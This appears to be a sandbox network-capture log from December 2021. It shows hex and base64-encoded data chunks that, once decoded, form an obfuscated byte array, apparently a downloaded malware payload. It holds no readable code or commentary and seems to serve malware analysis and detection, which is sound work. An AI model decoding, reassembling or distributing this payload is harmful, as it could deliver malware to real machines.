                                      2021-12-02 17:36:08 UTC132INData Raw: 6b 73 59 45 52 46 4c 47 42 47 51 69 78 67 51 7a 6b 73 59 45 52 47 4c 47 42 47 4e 53 78 67 4d 55 59 73 59 45 5a 45 4c 47 41 33 4e 79 78 67 52 44 4d 73 59 45 5a 44 4c 47 41 79 52 69 78 67 52 6b 59 73 59 44 51 31 4c 47 41 7a 52 69 78 67 52 55 51 73 59 45 4a 47 4c 47 42 47 4e 79 78 67 52 45 49 73 59 45 59 35 4c 47 41 33 4f 43 78 67 52 6b 59 73 59 44 52 46 4c 47 41 33 52 69 78 67 51 30 55 73 59 45 51 32 4c 47 42 42 52 69 78 67 4d 45 49 73 59 45 4a 44 4c 47 41 33 52 69 78 67 4d 30 51 73 59 45 4d 32 4c 47 41 35 51 69 78 67 4d 6a 49 73 59 45 45 30 4c 47 42 45 52 43 78 67 4d 45 55 73 59 44 6c 44 4c 47 41 33 52 69 78 67 4d 54 49 73 59 44 6b 35 4c 47 42 46 51 53 78 67 51 6b 59 73 59 45 55 79 4c 47 42 45 4e 79 78 67 52 6b 51 73 59 44 4a 45 4c 47 42 47 52 69 78 67 51
                                      Data Ascii: ksYERFLGBGQixgQzksYERGLGBGNSxgMUYsYEZELGA3NyxgRDMsYEZDLGAyRixgRkYsYDQ1LGAzRixgRUQsYEJGLGBGNyxgREIsYEY5LGA3OCxgRkYsYDRFLGA3RixgQ0UsYEQ2LGBBRixgMEIsYEJDLGA3RixgM0QsYEM2LGA5QixgMjIsYEE0LGBERCxgMEUsYDlDLGA3RixgMTIsYDk5LGBFQSxgQkYsYEUyLGBENyxgRkQsYDJELGBGRixgQ
                                      2021-12-02 17:36:08 UTC136INData Raw: 46 4c 47 42 43 52 69 78 67 52 6a 63 73 59 45 59 33 4c 47 42 47 4f 53 78 67 51 6b 51 73 59 45 4e 47 4c 47 42 45 4d 79 78 67 4e 30 59 73 59 45 56 45 4c 47 42 47 4e 79 78 67 52 6a 67 73 59 45 55 7a 4c 47 42 47 52 69 78 67 4f 54 49 73 59 45 59 30 4c 47 42 47 4e 79 78 67 52 6b 45 73 59 44 52 47 4c 47 42 47 52 53 78 67 4f 45 4d 73 59 44 64 47 4c 47 42 47 4f 43 78 67 51 54 63 73 59 45 4e 46 4c 47 42 44 52 69 78 67 4e 30 59 73 59 45 56 47 4c 47 42 47 4e 43 78 67 52 6a 63 73 59 45 5a 46 4c 47 41 79 4e 79 78 67 4d 30 55 73 59 45 5a 46 4c 47 42 42 4d 79 78 67 52 44 49 73 59 45 4d 35 4c 47 42 45 52 69 78 67 52 6a 67 73 59 44 46 43 4c 47 41 34 51 79 78 67 4e 30 59 73 59 44 6c 47 4c 47 42 47 4d 79 78 67 52 6a 51 73 59 44 68 47 4c 47 42 47 51 79 78 67 4d 6b 59 73 59 45
                                      Data Ascii: FLGBCRixgRjcsYEY3LGBGOSxgQkQsYENGLGBEMyxgN0YsYEVELGBGNyxgRjgsYEUzLGBGRixgOTIsYEY0LGBGNyxgRkEsYDRGLGBGRSxgOEMsYDdGLGBGOCxgQTcsYENFLGBDRixgN0YsYEVGLGBGNCxgRjcsYEZFLGAyNyxgM0UsYEZFLGBBMyxgRDIsYEM5LGBERixgRjgsYDFCLGA4QyxgN0YsYDlGLGBGMyxgRjQsYDhGLGBGQyxgMkYsYE
                                      2021-12-02 17:36:08 UTC140INData Raw: 51 53 78 67 52 6b 55 73 59 44 52 47 4c 47 42 42 4e 69 78 67 52 45 59 73 59 44 56 43 4c 47 42 47 51 53 78 67 52 6b 59 73 59 44 4e 47 4c 47 41 30 4e 69 78 67 52 6b 59 73 59 45 5a 47 4c 47 41 33 51 69 78 67 52 54 6b 73 59 45 4a 43 4c 47 42 45 52 69 78 67 4f 45 51 73 59 45 5a 46 4c 47 42 47 52 69 78 67 4e 54 63 73 59 45 5a 44 4c 47 41 31 51 53 78 67 4d 6a 49 73 59 45 4a 42 4c 47 42 43 52 69 78 67 4d 7a 45 73 59 44 64 45 4c 47 41 33 4e 69 78 67 52 6a 41 73 59 44 63 33 4c 47 42 45 4d 43 78 67 4d 55 59 73 59 45 55 35 4c 47 41 32 4e 79 78 67 52 45 59 73 59 45 5a 45 4c 47 42 46 51 69 78 67 52 6b 55 73 59 44 68 45 4c 47 42 47 4e 43 78 67 4e 30 59 73 59 45 5a 44 4c 47 41 30 4e 79 78 67 52 6b 55 73 59 45 5a 43 4c 47 42 46 52 69 78 67 52 6a 67 73 59 45 45 7a 4c 47 42
                                      Data Ascii: QSxgRkUsYDRGLGBBNixgREYsYDVCLGBGQSxgRkYsYDNGLGA0NixgRkYsYEZGLGA3QixgRTksYEJCLGBERixgOEQsYEZFLGBGRixgNTcsYEZDLGA1QSxgMjIsYEJBLGBCRixgMzEsYDdELGA3NixgRjAsYDc3LGBEMCxgMUYsYEU5LGA2NyxgREYsYEZELGBFQixgRkUsYDhELGBGNCxgN0YsYEZDLGA0NyxgRkUsYEZCLGBFRixgRjgsYEEzLGB
                                      2021-12-02 17:36:08 UTC144INData Raw: 6a 6b 73 59 45 4a 47 4c 47 41 30 4f 53 78 67 52 55 49 73 59 45 55 31 4c 47 42 43 51 69 78 67 51 6b 59 73 59 45 4e 43 4c 47 42 46 52 69 78 67 4d 54 55 73 59 44 45 35 4c 47 42 47 4e 53 78 67 52 55 59 73 59 44 51 31 4c 47 41 35 4f 43 78 67 4d 30 51 73 59 45 45 30 4c 47 41 31 4f 53 78 67 52 6b 59 73 59 44 41 78 4c 47 41 34 4e 53 78 67 4d 54 41 73 59 45 4a 47 4c 47 41 7a 4e 53 78 67 4d 44 55 73 59 44 4a 47 4c 47 41 33 52 69 78 67 4d 7a 63 73 59 44 59 78 4c 47 42 47 52 43 78 67 4f 54 4d 73 59 44 67 30 4c 47 42 46 4d 53 78 67 4d 30 59 73 59 44 51 32 4c 47 42 43 52 69 78 67 52 6b 59 73 59 44 41 78 4c 47 42 42 4e 43 78 67 4e 30 4d 73 59 44 5a 43 4c 47 41 30 4d 69 78 67 52 55 51 73 59 44 56 47 4c 47 41 79 4d 43 78 67 4e 6b 4d 73 59 45 5a 47 4c 47 41 35 52 43 78 67
                                      Data Ascii: jksYEJGLGA0OSxgRUIsYEU1LGBCQixgQkYsYENCLGBFRixgMTUsYDE5LGBGNSxgRUYsYDQ1LGA5OCxgM0QsYEE0LGA1OSxgRkYsYDAxLGA4NSxgMTAsYEJGLGAzNSxgMDUsYDJGLGA3RixgMzcsYDYxLGBGRCxgOTMsYDg0LGBFMSxgM0YsYDQ2LGBCRixgRkYsYDAxLGBBNCxgN0MsYDZCLGA0MixgRUQsYDVGLGAyMCxgNkMsYEZGLGA5RCxg
                                      2021-12-02 17:36:08 UTC148INData Raw: 4d 33 4c 47 42 47 52 69 78 67 52 6a 51 73 59 44 64 47 4c 47 42 42 52 53 78 67 52 6b 51 73 59 44 41 33 4c 47 42 45 4d 69 78 67 52 45 51 73 59 44 56 47 4c 47 42 47 51 79 78 67 51 55 59 73 59 44 46 44 4c 47 42 47 51 69 78 67 4e 6b 59 73 59 44 46 46 4c 47 42 47 51 79 78 67 52 54 59 73 59 44 4e 43 4c 47 41 35 51 53 78 67 51 30 45 73 59 45 45 79 4c 47 41 7a 4e 79 78 67 4d 45 59 73 59 44 64 46 4c 47 42 42 51 53 78 67 52 6b 55 73 59 44 4e 45 4c 47 41 7a 51 53 78 67 4e 6b 59 73 59 45 5a 46 4c 47 41 78 4d 79 78 67 51 7a 67 73 59 44 59 31 4c 47 42 47 52 43 78 67 51 7a 51 73 59 45 45 7a 4c 47 41 31 52 69 78 67 52 6a 41 73 59 44 42 47 4c 47 42 42 4e 53 78 67 52 45 49 73 59 44 46 47 4c 47 41 33 52 43 78 67 52 6b 55 73 59 45 4e 43 4c 47 42 47 51 79 78 67 4d 7a 63 73 59
                                      Data Ascii: M3LGBGRixgRjQsYDdGLGBBRSxgRkQsYDA3LGBEMixgREQsYDVGLGBGQyxgQUYsYDFDLGBGQixgNkYsYDFFLGBGQyxgRTYsYDNCLGA5QSxgQ0EsYEEyLGAzNyxgMEYsYDdFLGBBQSxgRkUsYDNELGAzQSxgNkYsYEZFLGAxMyxgQzgsYDY1LGBGRCxgQzQsYEEzLGA1RixgRjAsYDBGLGBBNSxgREIsYDFGLGA3RCxgRkUsYENCLGBGQyxgMzcsY
                                      2021-12-02 17:36:08 UTC153INData Raw: 31 52 53 78 67 52 6b 51 73 59 45 52 47 4c 47 42 46 52 53 78 67 52 6b 59 73 59 45 49 7a 4c 47 42 47 52 69 78 67 4e 6a 63 73 59 45 5a 42 4c 47 42 42 52 69 78 67 4d 55 55 73 59 45 5a 47 4c 47 42 45 52 53 78 67 51 7a 45 73 59 45 4d 79 4c 47 42 45 52 43 78 67 52 6b 55 73 59 44 5a 47 4c 47 42 43 52 53 78 67 52 6a 4d 73 59 45 52 43 4c 47 41 31 51 53 78 67 52 44 6b 73 59 45 52 46 4c 47 42 47 52 69 78 67 51 54 6b 73 59 45 5a 42 4c 47 41 33 51 69 78 67 4f 55 51 73 59 44 4d 33 4c 47 41 31 52 69 78 67 52 54 45 73 59 45 4e 45 4c 47 41 35 4d 79 78 67 52 6b 59 73 59 45 56 43 4c 47 41 7a 52 69 78 67 52 6b 45 73 59 44 51 33 4c 47 42 45 4d 79 78 67 52 45 59 73 59 45 55 31 4c 47 41 35 52 69 78 67 52 6b 49 73 59 44 6c 43 4c 47 41 7a 52 53 78 67 52 6a 63 73 59 45 52 47 4c 47
                                      Data Ascii: 1RSxgRkQsYERGLGBFRSxgRkYsYEIzLGBGRixgNjcsYEZBLGBBRixgMUUsYEZGLGBERSxgQzEsYEMyLGBERCxgRkUsYDZGLGBCRSxgRjMsYERCLGA1QSxgRDksYERFLGBGRixgQTksYEZBLGA3QixgOUQsYDM3LGA1RixgRTEsYENELGA5MyxgRkYsYEVCLGAzRixgRkEsYDQ3LGBEMyxgREYsYEU1LGA5RixgRkIsYDlCLGAzRSxgRjcsYERGLG
                                      2021-12-02 17:36:08 UTC157INData Raw: 52 54 49 73 59 45 52 47 4c 47 42 46 4d 69 78 67 52 44 63 73 59 45 5a 46 4c 47 42 43 52 69 78 67 4e 30 55 73 59 45 56 43 4c 47 42 45 52 69 78 67 4e 45 4d 73 59 44 59 32 4c 47 42 47 4e 43 78 67 4d 54 63 73 59 44 6b 7a 4c 47 42 46 4e 69 78 67 52 55 55 73 59 45 4a 44 4c 47 42 47 4f 43 78 67 51 55 59 73 59 45 5a 44 4c 47 41 34 52 69 78 67 52 6a 51 73 59 45 55 79 4c 47 42 47 52 69 78 67 4e 7a 51 73 59 44 63 35 4c 47 42 47 52 53 78 67 4e 7a 63 73 59 45 45 32 4c 47 42 43 52 69 78 67 51 30 51 73 59 44 56 47 4c 47 42 47 51 69 78 67 51 55 59 73 59 44 41 30 4c 47 42 42 4d 53 78 67 52 44 4d 73 59 44 49 31 4c 47 41 34 4d 69 78 67 51 55 51 73 59 44 52 43 4c 47 42 45 4d 69 78 67 52 44 67 73 59 44 6c 45 4c 47 41 7a 4e 79 78 67 52 6b 55 73 59 44 49 79 4c 47 42 43 51 79 78
                                      Data Ascii: RTIsYERGLGBFMixgRDcsYEZFLGBCRixgN0UsYEVCLGBERixgNEMsYDY2LGBGNCxgMTcsYDkzLGBFNixgRUUsYEJDLGBGOCxgQUYsYEZDLGA4RixgRjQsYEUyLGBGRixgNzQsYDc5LGBGRSxgNzcsYEE2LGBCRixgQ0QsYDVGLGBGQixgQUYsYDA0LGBBMSxgRDMsYDI1LGA4MixgQUQsYDRCLGBEMixgRDgsYDlELGAzNyxgRkUsYDIyLGBCQyx
                                      2021-12-02 17:36:08 UTC160INData Raw: 69 78 67 52 6b 59 73 59 44 49 32 4c 47 41 35 4e 43 78 67 4d 54 49 73 59 45 5a 42 4c 47 41 32 52 69 78 67 4e 6a 6b 73 59 44 4e 44 4c 47 42 43 52 69 78 67 4d 6a 63 73 59 45 5a 45 4c 47 42 47 52 43 78 67 4d 6a 55 73 59 45 5a 45 4c 47 41 35 52 43 78 67 52 44 4d 73 59 44 45 34 4c 47 42 47 52 53 78 67 4e 7a 51 73 59 44 67 79 4c 47 42 47 4e 53 78 67 4d 55 49 73 59 44 55 77 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 41 79 4c 47 42 43 4e 53 78 67 52 6b 51 73 59 44 6c 47 4c 47 42 42 4f 53 78 67 51 55 59 73 59 45 52 47 4c 47 41 35 4f 53 78 67 52 6a 41 73 59 45 5a 43 4c 47 41 32 4f 53 78 67 51 7a 49 73 59 45 55 7a 4c 47 41 30 52 69 78 67 4d 6a 63 73 59 45 51 34 4c 47 41 33 52 69 78 67 4d 6a 67 73 59 45 59 31 4c 47 42 47 4f 53 78 67 4f 54 51 73 59 45 4d 32 4c 47 42 47
                                      Data Ascii: ixgRkYsYDI2LGA5NCxgMTIsYEZBLGA2RixgNjksYDNDLGBCRixgMjcsYEZELGBGRCxgMjUsYEZELGA5RCxgRDMsYDE4LGBGRSxgNzQsYDgyLGBGNSxgMUIsYDUwLGBGRixgRkYsYDAyLGBCNSxgRkQsYDlGLGBBOSxgQUYsYERGLGA5OSxgRjAsYEZCLGA2OSxgQzIsYEUzLGA0RixgMjcsYEQ4LGA3RixgMjgsYEY1LGBGOSxgOTQsYEM2LGBG
                                      2021-12-02 17:36:08 UTC164INData Raw: 45 73 59 44 67 33 4c 47 42 47 52 69 78 67 52 44 51 73 59 44 5a 47 4c 47 42 47 52 53 78 67 4e 44 63 73 59 44 59 30 4c 47 41 77 4e 79 78 67 4e 30 59 73 59 44 45 79 4c 47 41 33 4d 69 78 67 4e 44 63 73 59 45 4d 33 4c 47 42 47 52 69 78 67 52 44 59 73 59 44 64 47 4c 47 42 47 4f 43 78 67 4f 54 4d 73 59 45 55 35 4c 47 42 47 52 69 78 67 4e 7a 67 73 59 45 59 33 4c 47 42 47 52 69 78 67 52 6b 45 73 59 44 55 33 4c 47 41 33 51 79 78 67 51 54 51 73 59 45 5a 47 4c 47 42 43 4e 43 78 67 4e 55 59 73 59 44 6c 42 4c 47 42 44 4f 43 78 67 4e 6b 4d 73 59 45 5a 46 4c 47 42 47 4e 69 78 67 51 6b 59 73 59 45 59 33 4c 47 41 32 52 69 78 67 52 6b 59 73 59 44 64 43 4c 47 41 32 52 69 78 67 52 6b 51 73 59 45 52 42 4c 47 41 31 4d 43 78 67 4e 44 45 73 59 45 4a 47 4c 47 41 77 4f 53 78 67 51
                                      Data Ascii: EsYDg3LGBGRixgRDQsYDZGLGBGRSxgNDcsYDY0LGAwNyxgN0YsYDEyLGA3MixgNDcsYEM3LGBGRixgRDYsYDdGLGBGOCxgOTMsYEU5LGBGRixgNzgsYEY3LGBGRixgRkEsYDU3LGA3QyxgQTQsYEZGLGBCNCxgNUYsYDlBLGBDOCxgNkMsYEZFLGBGNixgQkYsYEY3LGA2RixgRkYsYDdCLGA2RixgRkQsYERBLGA1MCxgNDEsYEJGLGAwOSxgQ
                                      2021-12-02 17:36:08 UTC168INData Raw: 47 4c 47 42 46 52 69 78 67 52 45 59 73 59 45 59 79 4c 47 41 77 52 69 78 67 4f 44 45 73 59 44 55 30 4c 47 42 47 52 53 78 67 4d 6a 45 73 59 44 4e 47 4c 47 41 31 4e 53 78 67 51 6b 59 73 59 45 56 45 4c 47 41 79 4d 43 78 67 52 6a 41 73 59 44 45 77 4c 47 41 77 4f 43 78 67 52 6b 4d 73 59 45 55 32 4c 47 41 34 4e 43 78 67 51 7a 41 73 59 44 56 47 4c 47 42 47 4d 43 78 67 4f 45 49 73 59 45 4a 47 4c 47 42 47 4f 43 78 67 4e 45 51 73 59 44 67 77 4c 47 42 44 4d 43 78 67 4f 55 59 73 59 45 59 77 4c 47 42 46 4d 79 78 67 51 7a 6b 73 59 44 64 47 4c 47 42 45 4f 53 78 67 4e 44 45 73 59 45 55 77 4c 47 41 77 52 69 78 67 4f 45 51 73 59 44 49 77 4c 47 42 47 4d 43 78 67 4f 45 59 73 59 45 4d 33 4c 47 41 78 4d 53 78 67 52 6a 67 73 59 44 5a 47 4c 47 41 35 4d 43 78 67 51 6a 55 73 59 45
                                      Data Ascii: GLGBFRixgREYsYEYyLGAwRixgODEsYDU0LGBGRSxgMjEsYDNGLGA1NSxgQkYsYEVELGAyMCxgRjAsYDEwLGAwOCxgRkMsYEU2LGA4NCxgQzAsYDVGLGBGMCxgOEIsYEJGLGBGOCxgNEQsYDgwLGBDMCxgOUYsYEYwLGBFMyxgQzksYDdGLGBEOSxgNDEsYEUwLGAwRixgOEQsYDIwLGBGMCxgOEYsYEM3LGAxMSxgRjgsYDZGLGA5MCxgQjUsYE
                                      2021-12-02 17:36:08 UTC172INData Raw: 4e 53 78 67 52 44 55 73 59 45 56 46 4c 47 42 47 52 69 78 67 4e 6a 41 73 59 44 67 30 4c 47 42 46 4f 53 78 67 4e 7a 63 73 59 44 63 35 4c 47 41 79 51 79 78 67 52 6b 51 73 59 45 5a 46 4c 47 41 7a 51 53 78 67 52 54 6b 73 59 45 49 7a 4c 47 41 7a 52 69 78 67 52 54 4d 73 59 44 4d 33 4c 47 42 47 4d 79 78 67 4d 54 59 73 59 45 4a 43 4c 47 41 77 52 53 78 67 4e 30 55 73 59 44 6b 7a 4c 47 42 47 52 69 78 67 4d 44 45 73 59 44 52 44 4c 47 41 33 4e 43 78 67 52 6a 51 73 59 44 4a 43 4c 47 41 34 52 53 78 67 4d 55 45 73 59 45 56 47 4c 47 42 44 4d 79 78 67 4e 55 59 73 59 44 51 31 4c 47 41 32 4f 53 78 67 4d 6a 4d 73 59 44 4d 79 4c 47 41 35 4e 43 78 67 51 6b 59 73 59 44 41 78 4c 47 41 78 4d 53 78 67 52 55 51 73 59 45 49 33 4c 47 41 30 4f 53 78 67 4d 55 59 73 59 45 5a 47 4c 47 42
                                      Data Ascii: NSxgRDUsYEVFLGBGRixgNjAsYDg0LGBFOSxgNzcsYDc5LGAyQyxgRkQsYEZFLGAzQSxgRTksYEIzLGAzRixgRTMsYDM3LGBGMyxgMTYsYEJCLGAwRSxgN0UsYDkzLGBGRixgMDEsYDRDLGA3NCxgRjQsYDJCLGA4RSxgMUEsYEVGLGBDMyxgNUYsYDQ1LGA2OSxgMjMsYDMyLGA5NCxgQkYsYDAxLGAxMSxgRUQsYEI3LGA0OSxgMUYsYEZGLGB
                                      2021-12-02 17:36:08 UTC176INData Raw: 6b 45 73 59 44 4a 45 4c 47 41 33 52 53 78 67 51 55 51 73 59 45 52 47 4c 47 42 46 4d 69 78 67 52 44 63 73 59 45 46 46 4c 47 41 33 52 53 78 67 4f 44 45 73 59 45 4e 46 4c 47 42 47 4f 53 78 67 4e 6b 59 73 59 44 52 46 4c 47 41 79 4d 79 78 67 52 6b 59 73 59 44 6b 35 4c 47 41 35 52 69 78 67 51 55 45 73 59 45 5a 47 4c 47 42 47 4f 53 78 67 51 30 55 73 59 45 4d 34 4c 47 42 47 52 69 78 67 52 54 55 73 59 45 5a 47 4c 47 41 77 51 53 78 67 4d 45 4d 73 59 44 4d 31 4c 47 41 33 52 43 78 67 52 6a 59 73 59 45 5a 45 4c 47 41 79 52 69 78 67 4d 30 4d 73 59 44 67 32 4c 47 42 47 51 53 78 67 52 6b 49 73 59 45 55 34 4c 47 42 44 4d 79 78 67 52 45 59 73 59 45 5a 44 4c 47 42 43 4e 79 78 67 4d 6a 63 73 59 45 5a 44 4c 47 42 47 52 69 78 67 52 6a 55 73 59 44 6c 47 4c 47 41 7a 4f 43 78 67
                                      Data Ascii: kEsYDJELGA3RSxgQUQsYERGLGBFMixgRDcsYEFFLGA3RSxgODEsYENFLGBGOSxgNkYsYDRFLGAyMyxgRkYsYDk5LGA5RixgQUEsYEZGLGBGOSxgQ0UsYEM4LGBGRixgRTUsYEZGLGAwQSxgMEMsYDM1LGA3RCxgRjYsYEZELGAyRixgM0MsYDg2LGBGQSxgRkIsYEU4LGBDMyxgREYsYEZDLGBCNyxgMjcsYEZDLGBGRixgRjUsYDlGLGAzOCxg
                                      2021-12-02 17:36:08 UTC180INData Raw: 64 47 4c 47 41 7a 4d 79 78 67 52 44 67 73 59 44 68 43 4c 47 41 31 52 69 78 67 52 55 59 73 59 45 49 33 4c 47 42 45 4f 53 78 67 52 6b 45 73 59 45 46 45 4c 47 42 42 4f 43 78 67 51 7a 63 73 59 44 46 47 4c 47 42 47 51 69 78 67 51 30 51 73 59 44 64 47 4c 47 41 7a 52 43 78 67 51 30 45 73 59 44 5a 42 4c 47 41 35 51 79 78 67 4f 44 55 73 59 44 4a 47 4c 47 42 47 52 69 78 67 4f 55 51 73 59 45 59 30 4c 47 42 47 4d 69 78 67 4e 6b 59 73 59 44 51 77 4c 47 42 42 52 53 78 67 51 7a 6b 73 59 45 59 33 4c 47 41 31 52 69 78 67 52 6b 59 73 59 45 45 31 4c 47 41 33 52 69 78 67 4d 44 51 73 59 45 51 30 4c 47 42 45 51 53 78 67 4d 30 59 73 59 45 59 30 4c 47 41 7a 52 69 78 67 52 6b 51 73 59 45 49 32 4c 47 41 78 52 53 78 67 4d 44 4d 73 59 45 5a 46 4c 47 42 46 52 53 78 67 51 6b 59 73 59
                                      Data Ascii: dGLGAzMyxgRDgsYDhCLGA1RixgRUYsYEI3LGBEOSxgRkEsYEFELGBBOCxgQzcsYDFGLGBGQixgQ0QsYDdGLGAzRCxgQ0EsYDZBLGA5QyxgODUsYDJGLGBGRixgOUQsYEY0LGBGMixgNkYsYDQwLGBBRSxgQzksYEY3LGA1RixgRkYsYEE1LGA3RixgMDQsYEQ0LGBEQSxgM0YsYEY0LGAzRixgRkQsYEI2LGAxRSxgMDMsYEZFLGBFRSxgQkYsY
                                      2021-12-02 17:36:08 UTC185INData Raw: 35 51 69 78 67 52 6b 55 73 59 45 4e 47 4c 47 41 33 52 69 78 67 52 6a 55 73 59 44 4a 47 4c 47 42 47 52 69 78 67 52 54 55 73 59 44 6c 46 4c 47 42 47 4e 79 78 67 52 6a 41 73 59 44 6c 43 4c 47 41 77 4d 79 78 67 52 54 59 73 59 45 5a 47 4c 47 42 47 4e 43 78 67 51 54 63 73 59 45 5a 44 4c 47 41 31 4f 53 78 67 4e 30 59 73 59 44 51 79 4c 47 42 43 51 53 78 67 52 6a 67 73 59 45 4e 47 4c 47 42 47 52 53 78 67 52 6a 63 73 59 44 56 47 4c 47 42 46 4f 53 78 67 51 7a 4d 73 59 45 5a 44 4c 47 41 30 52 43 78 67 4d 44 45 73 59 45 59 7a 4c 47 41 7a 4e 79 78 67 4d 6a 55 73 59 44 4e 45 4c 47 42 47 4e 43 78 67 4e 30 49 73 59 44 67 31 4c 47 41 7a 4d 43 78 67 52 6b 59 73 59 44 51 7a 4c 47 41 34 4f 43 78 67 52 54 4d 73 59 45 4a 47 4c 47 42 47 52 43 78 67 52 6a 67 73 59 45 56 45 4c 47
                                      Data Ascii: 5QixgRkUsYENGLGA3RixgRjUsYDJGLGBGRixgRTUsYDlFLGBGNyxgRjAsYDlCLGAwMyxgRTYsYEZGLGBGNCxgQTcsYEZDLGA1OSxgN0YsYDQyLGBCQSxgRjgsYENGLGBGRSxgRjcsYDVGLGBFOSxgQzMsYEZDLGA0RCxgMDEsYEYzLGAzNyxgMjUsYDNELGBGNCxgN0IsYDg1LGAzMCxgRkYsYDQzLGA4OCxgRTMsYEJGLGBGRCxgRjgsYEVELG
                                      2021-12-02 17:36:08 UTC189INData Raw: 52 6b 45 73 59 45 56 47 4c 47 41 7a 52 69 78 67 52 6b 59 73 59 44 59 31 4c 47 41 33 52 69 78 67 52 6b 55 73 59 45 59 35 4c 47 42 46 52 69 78 67 52 6b 51 73 59 44 64 43 4c 47 41 32 4e 79 78 67 52 54 63 73 59 45 55 35 4c 47 42 47 4e 79 78 67 52 6b 55 73 59 45 4d 78 4c 47 42 43 52 69 78 67 52 55 4d 73 59 44 64 47 4c 47 41 79 4d 53 78 67 4d 44 4d 73 59 45 59 34 4c 47 42 47 4d 69 78 67 51 6b 59 73 59 45 5a 47 4c 47 41 77 4d 79 78 67 51 7a 59 73 59 45 55 30 4c 47 41 31 52 53 78 67 52 6b 55 73 59 45 4a 42 4c 47 42 43 52 69 78 67 4e 54 4d 73 59 44 67 30 4c 47 41 79 4e 79 78 67 4e 30 55 73 59 44 4e 45 4c 47 41 35 51 53 78 67 52 6b 49 73 59 45 4a 47 4c 47 41 30 4d 69 78 67 4e 7a 6b 73 59 44 41 77 4c 47 42 46 4d 53 78 67 51 7a 41 73 59 44 52 47 4c 47 41 30 4d 79 78
                                      Data Ascii: RkEsYEVGLGAzRixgRkYsYDY1LGA3RixgRkUsYEY5LGBFRixgRkQsYDdCLGA2NyxgRTcsYEU5LGBGNyxgRkUsYEMxLGBCRixgRUMsYDdGLGAyMSxgMDMsYEY4LGBGMixgQkYsYEZGLGAwMyxgQzYsYEU0LGA1RSxgRkUsYEJBLGBCRixgNTMsYDg0LGAyNyxgN0UsYDNELGA5QSxgRkIsYEJGLGA0MixgNzksYDAwLGBFMSxgQzAsYDRGLGA0Myx
                                      2021-12-02 17:36:08 UTC192INData Raw: 69 78 67 4e 45 4d 73 59 44 42 44 4c 47 42 47 4e 79 78 67 4e 55 59 73 59 45 51 77 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 51 34 4c 47 41 31 4d 69 78 67 4d 30 55 73 59 44 59 77 4c 47 42 43 52 53 78 67 4f 54 51 73 59 44 59 7a 4c 47 42 46 51 79 78 67 52 45 59 73 59 45 59 30 4c 47 42 45 4e 79 78 67 52 44 67 73 59 45 5a 46 4c 47 41 34 52 43 78 67 51 7a 6b 73 59 44 63 33 4c 47 41 79 4e 79 78 67 52 55 55 73 59 45 5a 47 4c 47 41 77 4e 53 78 67 4e 30 59 73 59 45 5a 44 4c 47 42 42 52 69 78 67 4f 44 4d 73 59 44 52 47 4c 47 41 33 52 53 78 67 51 6b 51 73 59 45 59 30 4c 47 42 42 51 69 78 67 4d 30 59 73 59 45 59 31 4c 47 42 44 52 69 78 67 4e 30 51 73 59 45 59 34 4c 47 41 31 51 69 78 67 52 6b 55 73 59 44 41 32 4c 47 42 43 52 69 78 67 52 6a 6b 73 59 44 5a 47 4c 47 41 35
                                      Data Ascii: ixgNEMsYDBDLGBGNyxgNUYsYEQwLGBGRixgRkYsYDQ4LGA1MixgM0UsYDYwLGBCRSxgOTQsYDYzLGBFQyxgREYsYEY0LGBENyxgRDgsYEZFLGA4RCxgQzksYDc3LGAyNyxgRUUsYEZGLGAwNSxgN0YsYEZDLGBBRixgODMsYDRGLGA3RSxgQkQsYEY0LGBBQixgM0YsYEY1LGBDRixgN0QsYEY4LGA1QixgRkUsYDA2LGBCRixgRjksYDZGLGA5
                                      2021-12-02 17:36:08 UTC196INData Raw: 63 73 59 45 55 35 4c 47 42 43 52 69 78 67 51 6a 55 73 59 45 5a 44 4c 47 41 35 52 69 78 67 52 6b 59 73 59 44 59 7a 4c 47 42 47 52 69 78 67 51 30 51 73 59 44 64 45 4c 47 41 79 4d 43 78 67 51 6a 6b 73 59 45 5a 47 4c 47 41 31 4d 79 78 67 52 6a 55 73 59 44 45 33 4c 47 41 35 52 43 78 67 4d 7a 63 73 59 45 5a 46 4c 47 41 78 4e 69 78 67 51 6b 4d 73 59 45 59 78 4c 47 41 79 52 69 78 67 52 6b 51 73 59 44 5a 45 4c 47 41 33 52 69 78 67 52 6a 6b 73 59 44 46 47 4c 47 41 35 52 69 78 67 52 6b 55 73 59 45 4d 32 4c 47 42 47 52 69 78 67 4e 7a 6b 73 59 44 45 31 4c 47 41 30 51 79 78 67 51 7a 49 73 59 44 5a 47 4c 47 42 47 51 69 78 67 4f 55 49 73 59 45 5a 47 4c 47 42 43 51 53 78 67 4e 6b 55 73 59 44 45 79 4c 47 41 33 52 53 78 67 52 45 49 73 59 44 6c 47 4c 47 42 42 51 53 78 67 51
                                      Data Ascii: csYEU5LGBCRixgQjUsYEZDLGA5RixgRkYsYDYzLGBGRixgQ0QsYDdELGAyMCxgQjksYEZGLGA1MyxgRjUsYDE3LGA5RCxgMzcsYEZFLGAxNixgQkMsYEYxLGAyRixgRkQsYDZELGA3RixgRjksYDFGLGA5RixgRkUsYEM2LGBGRixgNzksYDE1LGA0QyxgQzIsYDZGLGBGQixgOUIsYEZGLGBCQSxgNkUsYDEyLGA3RSxgREIsYDlGLGBBQSxgQ
                                      2021-12-02 17:36:08 UTC200INData Raw: 47 4c 47 42 46 4f 43 78 67 51 30 55 73 59 44 68 43 4c 47 41 7a 4f 53 78 67 4e 55 55 73 59 44 4e 44 4c 47 42 47 52 53 78 67 4e 44 4d 73 59 44 64 46 4c 47 42 45 4d 79 78 67 4e 30 49 73 59 45 55 35 4c 47 41 32 52 69 78 67 52 6a 63 73 59 45 55 77 4c 47 41 32 4e 79 78 67 52 6b 55 73 59 44 64 43 4c 47 42 47 52 69 78 67 51 7a 55 73 59 44 56 47 4c 47 42 47 4f 43 78 67 4e 6a 4d 73 59 44 68 46 4c 47 41 79 51 79 78 67 51 6b 59 73 59 45 59 77 4c 47 42 42 4e 79 78 67 52 55 45 73 59 45 4a 47 4c 47 42 43 4d 43 78 67 52 6a 4d 73 59 45 55 79 4c 47 41 77 4f 43 78 67 4d 6b 59 73 59 45 5a 46 4c 47 42 45 4e 53 78 67 4e 30 59 73 59 45 52 43 4c 47 41 35 4d 79 78 67 4d 30 59 73 59 44 4e 47 4c 47 42 47 52 43 78 67 4d 54 4d 73 59 44 64 46 4c 47 42 45 4e 79 78 67 4d 30 59 73 59 45
